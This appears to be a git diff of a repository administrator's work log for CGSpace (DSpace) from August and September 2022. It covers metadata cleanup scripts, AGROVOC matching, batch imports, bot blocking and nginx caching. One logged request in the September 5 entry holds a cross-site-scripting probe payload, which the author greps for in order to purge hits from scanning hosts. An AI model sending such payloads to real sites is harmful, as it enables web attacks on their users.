$ ./ilri/check-duplicates.py -i ~/Downloads/2022-08-18-MELIAs-UTF-8-With-Files.csv -u dspace -db dspace -p 'fuuu' -o /tmp/melia-matches.csv
+
    +
  • Then I did some minor processing and checking of the duplicates file (for example, some titles appear more than once in both files), and joined with the other file (left join):
  • +
+
$ xsv join --left id ~/Downloads/2022-08-18-MELIAs-UTF-8-With-Files.csv id ~/Downloads/melia-matches-csv.csv > /tmp/melias-with-relations.csv
+
    +
  • I had to use xsv because csvcut was throwing an error detecting the dialect of the input CSVs (?)
  • +
  • I created a SAF bundle and imported the 749 MELIAs to DSpace Test
  • +
  • I found thirteen items on CGSpace with dates in format “DD/MM/YYYY” so I fixed those
  • +
+

2022-08-20

+
    +
  • Peter sent me back the results of the duplicate checking on the Gender presentations +
      +
    • There were only a handful of duplicates, so I used the IDs in the spreadsheet to flag and delete them in OpenRefine
    • +
    +
  • +
  • I had a new idea about matching AGROVOC subjects and countries in OpenRefine +
      +
    • I was previously splitting up the text value field (title/abstract/etc) by spaces and searching for each word in the list of terms/countries like this:
    • +
    +
  • +
+
with open(r"/tmp/cgspace-countries.txt",'r') as f:
+    countries = [name.rstrip().lower() for name in f]
+
+return "||".join([x for x in value.split(' ') if x.lower() in countries])
+
    +
  • But that misses multi-word terms/countries with spaces, so we can search the other way around by using a regex for each term/country and checking if it appears in the text value field:
  • +
+
import re
+
+with open(r"/tmp/agrovoc-subjects.txt",'r') as f:
+    terms = [name.rstrip().lower() for name in f]
+
+return "||".join([term for term in terms if re.match(r".*\b" + term + r"\b.*", value.lower())])
+
    +
  • Now we are only limited by our small (~1,400) list of AGROVOC subjects, so I did an export from PostgreSQL of all dcterms.subject values and am looking them up against AGROVOC’s API right now:
  • +
+
localhost/dspacetest= ☘ \COPY (SELECT DISTINCT text_value AS "dcterms.subject", count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id = 187 GROUP BY "dcterms.subject" ORDER BY count DESC) to /tmp/2022-08-20-agrovoc.csv WITH CSV HEADER;
+COPY 21685
+$ csvcut -c 1 /tmp/2022-08-20-agrovoc.csv | sed 1d > /tmp/all-subjects.txt
+$ ./ilri/agrovoc-lookup.py -i /tmp/all-subjects.txt -o 2022-08-20-all-subjects-results.csv
+$ csvgrep -c 'number of matches' -m 0 -i /tmp/2022-08-20-all-subjects-results.csv.bak | csvcut -c 1 | sed 1d > /tmp/agrovoc-subjects.txt
+$ wc -l /tmp/agrovoc-subjects.txt
+11834 /tmp/agrovoc-subjects.txt
+
    +
  • Then I created a new column joining the title and abstract, and ran the Jython expression above against this new file with 11,000 AGROVOC terms +
      +
    • Then I joined that column with Peter’s dcterms.subject column and then deduplicated it with this Jython:
    • +
    +
  • +
+
res = []
+
+[res.append(x) for x in value.split("||") if x not in res]
+
+return "||".join(res)
+
    +
  • This is way better, but you end up getting a bunch of countries, regions, and short words like “gates” matching in AGROVOC that are inappropriate (we typically don’t tag countries and regions as AGROVOC subjects) or incorrect (“gates” as in physical gates, not the funding agency) +
      +
    • I did a text facet in OpenRefine and removed a bunch of these by eye
    • +
    +
  • +
  • Then I finished adding the dcterms.relation and CRP metadata flagged by Peter on the Gender presentations +
      +
    • I’m waiting for him to send me the PDFs and then I will upload them to DSpace Test
    • +
    +
  • +
+

2022-08-21

+
    +
  • Start indexing on AReS
  • +
  • The load on CGSpace was around 5.0 today, and now that I started the harvesting it has been over 10 for an hour, sigh… +
      +
    • I’m going to try an experiment to block Googlebot, bingbot, and Yandex for a week to see if the load goes down
    • +
    +
  • +
+

2022-08-22

+
    +
  • I tried to re-generate the SAF bundle for the MARLO Innovations after improving the AGROVOC subjects and the v3 PDFs, but six are missing from the v3 zip that are present in the original zip: +
      +
    • ProjectInnovationSummary-WLE-P500-I78.pdf
    • +
    • ProjectInnovationSummary-WLE-P452-I699.pdf
    • +
    • ProjectInnovationSummary-WLE-P518-I696.pdf
    • +
    • ProjectInnovationSummary-WLE-P442-I740.pdf
    • +
    • ProjectInnovationSummary-WLE-P516-I647.pdf
    • +
    • ProjectInnovationSummary-WLE-P438-I585.pdf
    • +
    +
  • +
  • I downloaded them manually using the URLs in the original CSV
  • +
  • I also uploaded a new version of the MELIAs to DSpace Test
  • +
+

2022-08-23

+
    +
  • Checking the number of items on CGSpace so we can keep an eye on the 100,000 number:
  • +
+
dspace=# SELECT COUNT(uuid) FROM item WHERE in_archive='t';
+ count 
+-------
+ 95716
+(1 row)
+
    +
  • If I check OAI I see more, but perhaps that counts mapped items multiple times (a quick way to compare is sketched below, after the import command)
  • +
  • Peter said the 303 Gender PPTs were good to go, so I updated the collection mappings and IDs in OpenRefine and then uploaded them to CGSpace:
  • +
+
$ dspace import --add --eperson=fuu@fuu.com --source /tmp/SimpleArchiveFormat --mapfile=./2022-08-23-gender-ppts.map
+
+
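A quick way to compare with OAI is to look at the completeListSize attribute reported in the resumptionToken of a ListIdentifiers response (a sketch; it assumes the endpoint includes that optional attribute):

$ curl -s 'https://cgspace.cgiar.org/oai/request?verb=ListIdentifiers&metadataPrefix=oai_dc' \
    | grep -oE 'completeListSize="[0-9]+"'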

2022-08-24

+
    +
  • Start working on the MARLO OICRs +
      +
    • First I extracted the filenames and IDs from the v2 metadata file, then joined it with the UTF-8 version:
    • +
    +
  • +
+
$ xsv select 'cg.number (series/report No.),File' OICRS\ Metadata\ v2.csv > /tmp/OICR-files.csv
+$ xsv join --left 'cg.number (series/report No.)' OICRS\ metadata\ utf8\ 20220816_JM.csv 'cg.number (series/report No.)' /tmp/OICR-files.csv > OICRs-UTF-8-with-files.csv
+
    +
  • After that I imported it into OpenRefine for data cleaning +
      +
    • To enrich the metadata I combined the title and abstract into a new field and then checked my list of 11,000 AGROVOC terms against it
    • +
    • First, create a new column with this GREL:
    • +
    +
  • +
+
cells["dc.title"].value + " " + cells["dcterms.abstract"].value
+
    +
  • Then use this Jython:
  • +
+
import re
+
+with open(r"/tmp/agrovoc-subjects.txt",'r') as f : 
+    terms = [name.rstrip().lower() for name in f]
+
+return "||".join([term for term in terms if re.match(r".*\b" + term + r"\b.*", value.lower())])
+
    +
  • After that I de-duplicated the terms using this Jython:
  • +
+
res = []
+
+[res.append(x) for x in value.split("||") if x not in res]
+
+return "||".join(res)
+
    +
  • Then I split the multi-values on “||” and used a text facet to remove some countries and other nonsense terms that matched, like “gates” and “al” and “s” +
      +
    • Then I did the same for countries
    • +
    +
  • +
  • Then I exported the CSV and started searching for duplicates so that I can add them as relations:
  • +
+
$ ./ilri/check-duplicates.py -i ~/Downloads/2022-08-24-OICRs.csv -u dspace -db dspace -p 'omg' -o /tmp/oicrs-matches.csv
+
    +
  • Oh wow, I actually found one OICR already uploaded to CGSpace… I have to ask Jose about that
  • +
+

2022-08-25

+
    +
  • I started processing the MARLO Policies in OpenRefine, similar to the Innovations, MELIAs, and OICRs above +
      +
    • I also re-ran the AGROVOC matching on Innovations because my technique has improved since I ran it a few weeks ago
    • +
    +
  • +
+

2022-08-29

+
    +
  • Start a harvest on AReS
  • +
  • Meeting with Peter and Abenet about CGSpace issues
  • +
  • I mapped the one MARLO OICR duplicate from the CCAFS Reports collection and deleted it from the OICRs CSV
  • +
+

2022-08-30

+
    +
  • Manuel from the “Alianza SIDALC” in South America contacted me asking for permission to harvest CGSpace and include our content in their system +
      +
    • I responded that we would be glad if they harvested us, and that they should use a descriptive user agent so we can contact them in case of any issues or changes on the server
    • +
    +
  • +
  • I emailed ILRI ICT to ask how Abenet and I can use the CGSpace Support email address in our email applications because we haven’t checked that account in years +
      +
    • I tried to log in on office365.com but it gave an error
    • +
    • I got access to the account and cleaned up the inbox, unsubscribed from a bunch of Microsoft and Yammer feeds, etc
    • +
    +
  • +
  • Remind Dani, Tariku, and Andrea about the legacy links that we want to update on ILRI’s website: + +
  • +
  • Join the MARLO OICRs with their relations that I processed a few days ago (minus the second id column and some others):
  • +
+
$ xsv join --left id ~/Downloads/2022-08-24-OICRs.csv id ~/Downloads/oicrs-matches-csv.csv | xsv select '!id[1],Your Title,Their Title,Similarity,Your Date,Their Date,datediff' > /tmp/oicrs-with-relations.csv
+
    +
  • Then I cleaned them with csv-metadata-quality to catch some duplicates, add regions, etc and re-imported to OpenRefine +
      +
    • I flagged a few duplicates for Jose and he’ll let me know what to do with them
    • +
    +
  • +
  • I imported the OICRs to DSpace Test:
  • +
+
$ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx2048m"
+$ dspace import --add --eperson=fuuuu@fuuu.com --source /tmp/SimpleArchiveFormat-oicrs --mapfile=./2022-08-30-OICRs.map
+
    +
  • Meeting with Marie-Angelique, Abenet, Valentina, Sara, and Margarita about Types
  • +
  • I am testing the org.apache.cocoon.uploads.autosave=false setting for XMLUI so that files posted via multi-part forms get kept in memory instead of written to disk
  • +
  • Check the MARLO Policies for relations and join them with the main CSV file:
  • +
+
$ ./ilri/check-duplicates.py -i ~/Downloads/2022-08-25-Policies-UTF-8-With-Files.csv -u dspace -db dspace -p 'fuui' -o /tmp/policies-matches.csv
+$ xsv join --left id ~/Downloads/2022-08-25-Policies-UTF-8-With-Files.csv id /tmp/policies-matches.csv | xsv select '!id[1],Your Title,Their Title,Similarity,Your Date,Their Date' > /tmp/policies-with-relations.csv
+
diff --git a/docs/2022-09/index.html b/docs/2022-09/index.html
new file mode 100644
index 000000000..14b1240db
--- /dev/null
+++ b/docs/2022-09/index.html
@@ -0,0 +1,837 @@

September, 2022

+ +
+

2022-09-01

+
    +
  • A bit of work on the “Mapping CG Core–CGSpace–MEL–MARLO Types” spreadsheet
  • +
  • I tested an item submission on DSpace Test with the Cocoon org.apache.cocoon.uploads.autosave=false change +
      +
    • The submission works as expected
    • +
    +
  • +
  • Start debugging some region-related issues with csv-metadata-quality +
      +
    • I created a new test file test-geography.csv with some different scenarios
    • +
    • I also fixed a few bugs and improved the region-matching logic
    • +
    +
  • +
+ +

2022-09-02

+
    +
  • I worked a bit more on exclusion and skipping logic in csv-metadata-quality +
      +
    • I also pruned and updated all the Python dependencies
    • +
    • Then I released version 0.6.0 now that the excludes and region matching support is working way better
    • +
    +
  • +
+

2022-09-05

+
    +
  • Started a harvest on AReS last night
  • +
  • Looking over the Solr statistics from last month I see many user agents that look suspicious: +
      +
    • Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0E; .NET4.0C)
    • +
    • Mozilla / 5.0(Windows NT 10.0; Win64; x64) AppleWebKit / 537.36(KHTML, like Gecko) Chrome / 77.0.3865.90 Safari / 537.36
    • +
    • Mozilla/5.0 (Windows NT 10.0; WOW64; Rv:50.0) Gecko/20100101 Firefox/50.0
    • +
    • Mozilla/5.0 (X11; Linux i686; rv:2.0b12pre) Gecko/20110204 Firefox/4.0b12pre
    • +
    • Mozilla/5.0 (Windows NT 10.0; Win64; x64; Xbox; Xbox One) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Edge/44.18363.8131
    • +
    • Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
    • +
    • Mozilla/4.0 (compatible; MSIE 4.5; Windows 98;)
    • +
    • curb
    • +
    • bitdiscovery
    • +
    • omgili/0.5 +http://omgili.com
    • +
    • Mozilla/5.0 (compatible)
    • +
    • Vizzit
    • +
    • Mozilla/5.0 (Windows NT 5.1; rv:52.0) Gecko/20100101 Firefox/52.0
    • +
    • Mozilla/5.0 (Android; Mobile; rv:13.0) Gecko/13.0 Firefox/13.0
    • +
    • Java/17-ea
    • +
    • AdobeUxTechC4-Async/3.0.12 (win32)
    • +
    • ZaloPC-win32-24v473
    • +
    • Mozilla/5.0/Firefox/42.0 - nbertaupete95(at)gmail.com
    • +
    • Scoop.it
    • +
    • Mozilla/5.0 (Windows NT 6.1; rv:27.0) Gecko/20100101 Firefox/27.0
    • +
    • Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
    • +
    • ows NT 10.0; WOW64; rv: 50.0) Gecko/20100101 Firefox/50.0
    • +
    • WebAPIClient
    • +
    • Mozilla/5.0 Firefox/26.0
    • +
    • Mozilla/5.0 (compatible; woorankreview/2.0; +https://www.woorank.com/)
    • +
    +
  • +
  • For example, some are apparently using versions of Firefox that are over ten years old, and some are obviously trying to look like valid user agents, but making typos (Mozilla / 5.0)
  • +
  • Tons of hosts making requests like this:
  • +
+
GET /bitstream/handle/10568/109408/Milk%20testing%20lab%20protocol.pdf?sequence=1&isAllowed=\x22><script%20>alert(String.fromCharCode(88,83,83))</script> HTTP/1.1" 400 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Rv:50.0) Gecko/20100101 Firefox/50.0
+
    +
  • I got a list of hosts making requests like that so I can purge their hits:
  • +
+
# zcat /var/log/nginx/{access,library-access,oai,rest}.log.[123]*.gz | grep 'String.fromCharCode(' | awk '{print $1}' | sort -u > /tmp/ips.txt 
+
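The purge itself was presumably done with the same helper script used elsewhere in these notes, something like:

$ ./ilri/check-spider-ip-hits.sh -f /tmp/ips.txt -p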
    +
  • I purged 4,718 hits from those IPs
  • +
  • I see some new Hetzner ranges that I hadn’t blocked yet apparently? + +
  • +
+
$ awk '{print $1}' /tmp/hetzner.txt | wc -l
+36
+$ sort -u /tmp/hetzner-combined.txt  | wc -l
+49
+
    +
  • I will add this new list to nginx’s bot-networks.conf so they get throttled on scraping XMLUI and get classified as bots in Solr statistics
  • +
  • Then I purged hits from the following user agents:
  • +
+
$ ./ilri/check-spider-hits.sh -f /tmp/agents
+Found 374 hits from curb in statistics
+Found 350 hits from bitdiscovery in statistics
+Found 564 hits from omgili in statistics
+Found 390 hits from Vizzit in statistics
+Found 9125 hits from AdobeUxTechC4-Async in statistics
+Found 97 hits from ZaloPC-win32-24v473 in statistics
+Found 518 hits from nbertaupete95 in statistics
+Found 218 hits from Scoop.it in statistics
+Found 584 hits from WebAPIClient in statistics
+
+Total number of hits from bots: 12220
+
    +
  • Then I will add these user agents to the ILRI spider override in DSpace
  • +
+

2022-09-06

+
    +
  • I’m testing dspace-statistics-api with our DSpace 7 test server +
      +
    • After setting up the env and the database the python -m dspace_statistics_api.indexer runs without issues
    • +
    • While playing with Solr I tried to search for statistics from this month using time:2022-09* but I get this error: “Can’t run prefix queries on numeric fields”
    • +
    • I guess that the syntax in Solr changed since 4.10…
    • +
    • This works, but is super annoying: time:[2022-09-01T00:00:00Z TO 2022-09-30T23:59:59Z]
    • +
    +
  • +
+
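For reference, the full range query against the statistics core looks something like this (a sketch; the host and port for the DSpace 7 Solr are assumptions):

$ curl -s -G 'http://localhost:8983/solr/statistics/select' \
    --data-urlencode 'q=time:[2022-09-01T00:00:00Z TO 2022-09-30T23:59:59Z]' \
    --data-urlencode 'rows=0'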

2022-09-07

+
    +
  • I tested the controlled-vocabulary changes on DSpace 6 and they work fine +
      +
    • Last week I found that DSpace 7 is more strict with controlled vocabularies and requires IDs for all node values
    • +
    • This is a pain because it means I have to re-do the IDs in each file every time I update them
    • +
    • If I add id="0000" to each, then I can use this vim expression let i=0001 | g/0000/s//\=i/ | let i=i+1 to replace the numbers with increments starting from 1
    • +
    +
  • +
  • Meeting with Marie Angelique, Abenet, Sara, and Margarita to continue the discussion about Types from last week +
      +
    • We made progress with concrete actions and will continue next week
    • +
    +
  • +
+

2022-09-08

+
    +
  • I had a meeting with Nicky from UNEP to discuss issues they are having with their DSpace +
      +
    • I told her about the meeting of DSpace community people that we’re planning at ILRI in the next few weeks
    • +
    +
  • +
+

2022-09-09

+
    +
  • Add some value mappings to AReS because I see a lot of incorrect regions and countries
  • +
  • I also found some values that were blank in CGSpace so I deleted them:
  • +
+
dspace=# BEGIN;
+BEGIN
+dspace=# DELETE FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND text_value='';
+DELETE 70
+dspace=# COMMIT;
+COMMIT
+
    +
  • Start a full Discovery index on CGSpace to catch these changes in the Discovery
  • +
+

2022-09-11

+
    +
  • Today is Sunday and I see the load on the server is high +
      +
    • Google and a bunch of other bots have been blocked on XMLUI for the past two weeks so it’s not from them!
    • +
    • Looking at the top IPs this morning:
    • +
    +
  • +
+
# cat /var/log/nginx/{access,library-access,oai,rest}.log /var/log/nginx/{access,library-access,oai,rest}.log.1 | grep '11/Sep/2022' | awk '{print $1}' | sort | uniq -c | sort -h | tail -n 40
+...
+    165 64.233.172.79
+    166 87.250.224.34
+    200 69.162.124.231
+    202 216.244.66.198
+    385 207.46.13.149
+    398 207.46.13.147
+    421 66.249.64.185
+    422 157.55.39.81
+    442 2a01:4f8:1c17:5550::1
+    451 64.124.8.36
+    578 137.184.159.211
+    597 136.243.228.195
+   1185 66.249.64.183
+   1201 157.55.39.80
+   3135 80.248.237.167
+   4794 54.195.118.125
+   5486 45.5.186.2
+   6322 2a01:7e00::f03c:91ff:fe9a:3a37
+   9556 66.249.64.181
+
    +
  • The top is still Google, but all the requests are HTTP 503 because I classified them as bots for XMLUI at least
  • +
  • Then there’s 80.248.237.167, which is using a normal user agent and scraping Discovery +
      +
    • That IP is on Internet Vikings aka Internetbolaget and we are already marking that subnet as ‘bot’ for XMLUI so most of these requests are HTTP 503
    • +
    +
  • +
  • On another note, I’m curious to explore enabling caching of certain REST API responses +
      +
    • For example, where the use case is harvesting rather than actual clients fetching bitstreams or thumbnails, there might be a benefit to speeding up responses for subsequent requesters:
    • +
    +
  • +
+
# awk '{print $7}' /var/log/nginx/rest.log | grep -v retrieve | sort | uniq -c | sort -h | tail -n 10
+      4 /rest/items/3f692ddd-7856-4bf0-a587-99fb3df0688a/bitstreams
+      4 /rest/items/3f692ddd-7856-4bf0-a587-99fb3df0688a/metadata
+      4 /rest/items/b014e36f-b496-43d8-9148-cc9db8a6efac/bitstreams
+      4 /rest/items/b014e36f-b496-43d8-9148-cc9db8a6efac/metadata
+      5 /rest/handle/10568/110310?expand=all
+      5 /rest/handle/10568/89980?expand=all
+      5 /rest/handle/10568/97614?expand=all
+      6 /rest/handle/10568/107086?expand=all
+      6 /rest/handle/10568/108503?expand=all
+      6 /rest/handle/10568/98424?expand=all
+
    +
  • I specifically have to not cache things like requests for bitstreams because those are from actual users and we need to keep the real requests so we get the statistics hit +
      +
    • Will be interesting to check the results above as the day goes on (now 10AM)
    • +
    • To estimate the potential savings from caching I will check how many non-bitstream requests are made versus how many are made more than once (updated the next morning using yesterday’s log):
    • +
    +
  • +
+
# awk '{print $7}' /var/log/nginx/rest.log.1 | grep -v retrieve | sort -u | wc -l
+33733
+# awk '{print $7}' /var/log/nginx/rest.log.1 | grep -v retrieve | sort | uniq -c | awk '$1 > 1' | wc -l
+5637
+
    +
  • In the afternoon I started a harvest on AReS (which should affect the numbers above also)
  • +
  • I enabled an nginx proxy cache on DSpace Test for this location regex: location ~ /rest/(handle|items|collections|communities)/.+
  • +
+
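The nginx side of that is roughly the following (a sketch, not the exact config; the zone name, sizes, cache validity, and upstream are assumptions, though the cache path and location regex match what is described in these notes):

proxy_cache_path /var/cache/nginx/rest_cache levels=1:2 keys_zone=rest_cache:1m max_size=1g inactive=24h;

location ~ /rest/(handle|items|collections|communities)/.+ {
    proxy_cache rest_cache;
    proxy_cache_valid 200 24h;
    add_header X-Cache-Status $upstream_cache_status;
    # the upstream here is an assumption; in reality this proxies to Tomcat
    proxy_pass http://localhost:8080;
}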

2022-09-12

+
    +
  • I am testing harvesting DSpace Test via AReS with the nginx proxy cache enabled +
      +
    • I had to tune the regular expression in nginx a bit because the REST requests OpenRXV uses weren’t matching
    • +
    • Now I’m trying this one: /rest/(handle|items|collections|communities)/?
    • +
    • Testing in regex101.com with this test string:
    • +
    +
  • +
+
/rest/handle/10568/27611
+/rest/items?expand=metadata,parentCommunityList,parentCollectionList,bitstreams&limit=10&offset=36270
+/rest/handle/10568/110310?expand=all
+/rest/rest/bitstreams/28926633-c7c2-49c2-afa8-6d81cadc2316/retrieve
+/rest/bitstreams/15412/retrieve
+/rest/items/083dbb0d-11e2-4dfe-902b-eb48e4640d04/metadata
+/rest/items/083dbb0d-11e2-4dfe-902b-eb48e4640d04/bitstreams
+/rest/collections/edea23c0-0ebd-4525-90b0-0b401f997704/items
+/rest/items/14507941-aff2-4d57-90bd-03a0733ad859/metadata
+/rest/communities/b38ea726-475f-4247-a961-0d0b76e67f85/collections
+/rest/collections/e994c450-6ff7-41c6-98df-51e5c424049e/items?limit=10000
+
    +
  • I estimate that it will take about 1GB of cache to harvest 100,000 items from CGSpace with OpenRXV (10,000 pages)
  • +
  • Basically all but the fourth and fifth test URLs (the bitstream retrievals) should match
  • +
  • Upload 682 OICRs from MARLO to CGSpace +
      +
    • We had tested these on DSpace Test last month along with the MELIAs, Policies, and Innovations, but we decided to upload the OICRs first so that other things can link against them as related items
    • +
    +
  • +
+

2022-09-14

+
    +
  • Meeting with Peter, Abenet, Indira, and Michael about CGSpace rollout plan for the Initiatives
  • +
+

2022-09-16

+
    +
  • Meeting with Marie-Angelique, Abenet, Margarita, and Sara about types for CG Core +
      +
    • We are about halfway through the list of types now, with concrete actions for CG Core and CGSpace
    • +
    • We will meet next in two weeks to hopefully finalize the list, then we can move on to definitions
    • +
    +
  • +
+

2022-09-18

+
    +
  • Deploy the org.apache.cocoon.uploads.autosave=false change on CGSpace
  • +
  • Start a harvest on AReS
  • +
+

2022-09-19

+
    +
  • Deploy the nginx proxy cache for /rest requests on CGSpace +
      +
    • I had tested this last week on DSpace Test
    • +
    • By my counts on CGSpace yesterday (Sunday, a busy day for the REST API), we had 5,654 URLs that were requested more than twice, and it tails off after that towards two, three, four, etc:
    • +
    +
  • +
+
# awk '{print $7}' /var/log/nginx/rest.log.1 | grep -v retrieve | sort | uniq -c | awk '$1 > 1' | wc -l
+5654
+# awk '{print $7}' /var/log/nginx/rest.log.1 | grep -v retrieve | sort | uniq -c | awk '$1 == 2' | wc -l
+4710
+# awk '{print $7}' /var/log/nginx/rest.log.1 | grep -v retrieve | sort | uniq -c | awk '$1 == 3' | wc -l
+814
+# awk '{print $7}' /var/log/nginx/rest.log.1 | grep -v retrieve | sort | uniq -c | awk '$1 == 4' | wc -l
+86
+# awk '{print $7}' /var/log/nginx/rest.log.1 | grep -v retrieve | sort | uniq -c | awk '$1 == 5' | wc -l
+39
+
    +
  • For now I guess requests that were done two or three times by different clients will be cached and that’s a win, and I expect more and more REST API activity soon when initiatives and One CGIAR stuff picks up
  • +
+

2022-09-20

+
    +
  • I checked the status of the nginx REST API cache on CGSpace and it was stuck at 7,083 items for hours:
  • +
+
# find /var/cache/nginx/rest_cache/ -type f | wc -l
+7083
+
    +
  • The proxy cache key zone is currently 1m, which can store ~8,000 keys, so that could be what we’re running into +
      +
    • I increased it to 2m and will keep monitoring it
    • +
    +
  • +
  • The CIP webmaster contacted me to say they are having problems harvesting CGSpace from their WordPress site +
      +
    • I am not sure if there are issues due to the REST API caching I enabled…
    • +
    +
  • +
+

2022-09-21

+
    +
  • Planning the Nairobi DSpace Users meeting with Abenet
  • +
  • Planning to have a call about MEL submitting to CGSpace on Monday with Mohammed Salem +
      +
    • I created two collections on DSpace Test: one with a workflow, and one without
    • +
    • According to my notes from 2020-10 the account must be in the admin group in order to submit via the REST API, so I added it to the admin group of each collection
    • +
    +
  • +
+

2022-09-22

+
    +
  • Nairobi DSpace users meeting at ILRI
  • +
  • I found a few users that didn’t have ORCID iDs and were missing tags on CGSpace so I tagged them:
  • +
+
dc.contributor.author,cg.creator.identifier
+"Alonso, Silvia","Silvia Alonso: 0000-0002-0565-536X"
+"Goopy, John P.","John Goopy: 0000-0001-7177-1310"
+"Korir, Daniel","Daniel Korir: 0000-0002-1356-8039"
+"Leitner, Sonja","Sonja Leitner: 0000-0002-1276-8071"
+"Fèvre, Eric M.","Eric M. Fèvre: 0000-0001-8931-4986"
+"Galiè, Alessandra","Alessandra Galie: 0000-0001-9868-7733"
+"Baltenweck, Isabelle","Isabelle Baltenweck: 0000-0002-4147-5921"
+"Robinson, Timothy P.","Timothy Robinson: 0000-0002-4266-963X"
+"Lannerstad, Mats","Mats Lannerstad: 0000-0002-5116-3198"
+"Graham, Michael","Michael Graham: 0000-0002-1189-8640"
+"Merbold, Lutz","Lutz Merbold: 0000-0003-4974-170X"
+"Rufino, Mariana C.","Mariana Rufino: 0000-0003-4293-3290"
+"Wilkes, Andreas","Andreas Wilkes: 0000-0001-7546-991X"
+"van der Weerden, T.","Tony van der Weerden: 0000-0002-6999-2584"
+"Vermeulen, S.","Sonja Vermeulen: 0000-0001-6242-9513"
+"Vermeulen, Sonja","Sonja Vermeulen: 0000-0001-6242-9513"
+"Vermeulen, Sonja J.","Sonja Vermeulen: 0000-0001-6242-9513"
+"Hung Nguyen-Viet","Hung Nguyen-Viet: 0000-0003-1549-2733"
+"Herrero, Mario T.","Mario Herrero: 0000-0002-7741-5090"
+"Thornton, Philip K.","Philip Thornton: 0000-0002-1854-0182"
+"Duncan, Alan J.","Alan Duncan: 0000-0002-3954-3067"
+"Lukuyu, Ben A.","Ben Lukuyu: 0000-0002-9374-3553"
+"Lindahl, Johanna F.","Johanna Lindahl: 0000-0002-1175-0398"
+"Okeyo Mwai, Ally","Ally Okeyo Mwai: 0000-0003-2379-7801"
+"Wieland, Barbara","Barbara Wieland: 0000-0003-4020-9186"
+"Omore, Amos O.","Amos Omore: 0000-0001-9213-9891"
+"Randolph, Thomas F.","Thomas Fitz Randolph: 0000-0003-1849-9877"
+"Staal, Steven J.","Steven Staal: 0000-0002-1244-1773"
+"Hanotte, Olivier H.","Olivier Hanotte: 0000-0002-2877-4767"
+"Dessie, Tadelle","Tadelle Dessie: 0000-0002-1630-0417"
+"Dione, Michel M.","Michel Dione: 0000-0001-7812-5776"
+"Gebremedhin, Berhanu","Berhanu Gebremedhin: 0000-0002-3168-2783"
+"Ouma, Emily A.","Emily Ouma: 0000-0002-3123-1376"
+"Roesel, Kristina","Kristina Roesel: 0000-0002-2553-1129"
+"Bishop, Richard P.","Richard Bishop: 0000-0002-3720-9970"
+"Lapar, Ma. Lucila","Ma. Lucila Lapar: 0000-0002-4214-9845"
+"Rich, Karl M.","Karl Rich: 0000-0002-5581-9553"
+"Hoekstra, Dirk","Dirk Hoekstra: 0000-0002-6111-6627"
+"Nene, Vishvanath","Vishvanath Nene: 0000-0001-7066-4169"
+"Patel, S.P.","Sonal Henson: 0000-0002-2002-5462"
+"Hanson, Jean","Jean Hanson: 0000-0002-3648-2641"
+"Marshall, Karen","Karen Marshall: 0000-0003-4197-1455"
+"Notenbaert, An Maria Omer","An Maria Omer Notenbaert: 0000-0002-6266-2240"
+"Ojango, Julie M.K.","Ojango J.M.K.: 0000-0003-0224-5370"
+"Wijk, Mark T. van","Mark van Wijk: 0000-0003-0728-8839"
+"Tarawali, Shirley A.","Shirley Tarawali: 0000-0001-9398-8780"
+"Naessens, Jan","Jan Naessens: 0000-0002-7075-9915"
+"Butterbach-Bahl, Klaus","Klaus Butterbach-Bahl: 0000-0001-9499-6598"
+"Poole, Elizabeth J.","Elizabeth Jane Poole: 0000-0002-8570-794X"
+"Mulema, Annet A.","Annet Mulema: 0000-0003-4192-3939"
+"Dror, Iddo","Iddo Dror: 0000-0002-0800-7456"
+"Ballantyne, Peter G.","Peter G. Ballantyne: 0000-0001-9346-2893"
+"Baker, Derek","Derek Baker: 0000-0001-6020-6973"
+"Ericksen, Polly J.","Polly Ericksen: 0000-0002-5775-7691"
+"Jones, Christopher S.","Chris Jones: 0000-0001-9096-9728"
+"Mude, Andrew G.","Andrew Mude: 0000-0003-4903-6613"
+"Puskur, Ranjitha","Ranjitha Puskur: 0000-0002-9112-3414"
+"Kiara, Henry K.","Henry Kiara: 0000-0001-9578-1636"
+"Gibson, John P.","John Gibson: 0000-0003-0371-2401"
+"Flintan, Fiona E.","Fiona Flintan: 0000-0002-9732-097X"
+"Mrode, Raphael A.","Raphael Mrode: 0000-0003-1964-5653"
+"Mtimet, Nadhem","Nadhem Mtimet: 0000-0003-3125-2828"
+"Said, Mohammed Yahya","Mohammed Yahya Said: 0000-0001-8127-6399"
+"Pezo, Danilo A.","Danilo Pezo: 0000-0001-5345-5314"
+"Haileslassie, Amare","Amare Haileslassie: 0000-0001-5237-9006"
+"Wright, Iain A.","Iain Wright: 0000-0002-6216-5308"
+"Cadilhon, Joseph J.","Jean-Joseph Cadilhon: 0000-0002-3181-5136"
+"Domelevo Entfellner, Jean-Baka","Jean-Baka Domelevo Entfellner: 0000-0002-8282-1325"
+"Oyola, Samuel O.","Samuel O. Oyola: 0000-0002-6425-7345"
+"Agaba, M.","Morris Agaba: 0000-0001-6777-0382"
+"Beebe, Stephen E.","Stephen E Beebe: 0000-0002-3742-9930"
+"Ouso, Daniel","Daniel Ouso: 0000-0003-0994-2558"
+"Ouso, Daniel O.","Daniel Ouso: 0000-0003-0994-2558"
+"Rono, Gilbert K.","Gilbert Kibet-Rono: 0000-0001-8043-5423"
+"Kibet, Gilbert","Gilbert Kibet-Rono: 0000-0001-8043-5423"
+"Juma, John","John Juma: 0000-0002-1481-5337"
+"Juma, J.","John Juma: 0000-0002-1481-5337"
+$ ./ilri/add-orcid-identifiers-csv.py -i /tmp/2022-09-22-add-orcids.csv -db dspace -u dspace -p 'fuuu'
+
    +
  • This adds nearly 5,500 ORCID tags! +
      +
    • Some of these authors were not in the controlled vocabulary so I added them
    • +
    +
  • +
+

2022-09-23

+
    +
  • Tag some more ORCID metadata (amended above)
  • +
  • Meeting with Peter and Abenet to discuss CGSpace issues +
      +
    • We found a workable solution to the MEL submission issue: they can submit to a dedicated MEL-only collection with no workflow and we will map or move the items after
    • +
    +
  • +
  • Pascal says that they have made a pull request for their duplicate checker on DSpace 7 yayyyy
  • +
+

2022-09-24

+
    +
  • Found some more ORCID identifiers to tag so I added them to the list above
